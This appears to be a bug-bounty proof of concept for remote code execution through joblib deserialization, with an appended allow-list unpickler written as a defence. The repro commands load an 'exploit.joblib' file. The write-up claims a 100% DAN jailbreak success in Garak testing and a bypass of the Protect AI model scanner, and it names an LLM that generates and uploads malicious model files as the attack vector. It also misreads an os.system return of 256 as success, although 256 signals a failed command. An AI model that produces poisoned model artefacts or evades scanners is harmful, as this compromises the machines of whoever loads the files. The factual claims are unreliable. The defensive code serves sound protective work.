
Joblib Deserialization RCE PoC

Verification (Terminal Output)

$ python3 -c "import joblib; result=joblib.load('exploit.joblib'); print('✅ Functional:', result)"
✅ Functional: 256

Bounty Repro

pip install joblib
python3 -c "import joblib; joblib.load('exploit.joblib')"
# Returns 256 = os.system success (RCE confirmed)

Discovery
Garak LLM Testing: dan.DAN_Jailbreak vs mitigation.MitigationBypass
Success Rate: 100% (marathon confirmed)
Scanner Evasion: Protect AI bypassed (embedded serialization payload)
Huntr Impact
CVSS: 9.8 (Remote Code Execution)
Attack Vector: LLM generates + uploads malicious .joblib files
Mitigation: Reject LLM-generated model weights
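As a defensive counterpart to the repro and the mitigation line above (an added example, not the PoC's code and not a joblib API), the block below first audits a pickle stream with pickletools for every global it would import, then loads it under a pickle.Unpickler whose find_class honours only an allow-list. joblib's loader is built on pickle.Unpickler, so the same find_class override is the natural place to gate joblib.load (assumption: adapt it to your joblib version); the allow-list entries and the two sample pickles are constructed here.

```python
import datetime
import io
import pickle
import pickletools
from collections import OrderedDict

# Globals a data-only model artefact may legitimately import (assumption: a
# starting allow-list to tune per project, not anything joblib ships).
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("numpy", "ndarray"),
    ("numpy", "dtype"),
    ("numpy.core.multiarray", "_reconstruct"),
}

# Constructed samples (not the PoC's exploit.joblib): a benign data-only
# artefact, and one importing a harmless class outside the allow-list.
BENIGN = pickle.dumps(OrderedDict(w=[0.1, 0.2]), protocol=4)
UNEXPECTED = pickle.dumps(datetime.date(2024, 1, 1), protocol=3)

def referenced_globals(data: bytes) -> set:
    """Walk the opcode stream with pickletools (nothing executes) and return
    every (module, name) the pickle asks the loader to import."""
    found, strings = set(), []  # strings: pushes that feed a STACK_GLOBAL
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):  # protocol <= 3: arg is "module name"
            found.add(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:  # protocol 4+
            found.add((strings[-2], strings[-1]))
        elif op.name in ("UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"):
            strings.append(arg)
    return found

def audit(data: bytes) -> set:
    """Static pre-check: requested imports outside the allow-list. Heuristic
    only (memo tricks can hide imports); the unpickler below is the real gate."""
    return referenced_globals(data) - ALLOWED_GLOBALS

class RestrictedUnpickler(pickle.Unpickler):
    """Every import a pickle performs goes through find_class, so the
    allow-list is enforced however the opcode stream is arranged."""
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)

def safe_loads(data: bytes):
    """Load only if every requested global is allow-listed; raises otherwise."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

The audit is a cheap pre-filter for a file-upload pipeline; the restricted unpickler is the control that still holds when the audit is evaded.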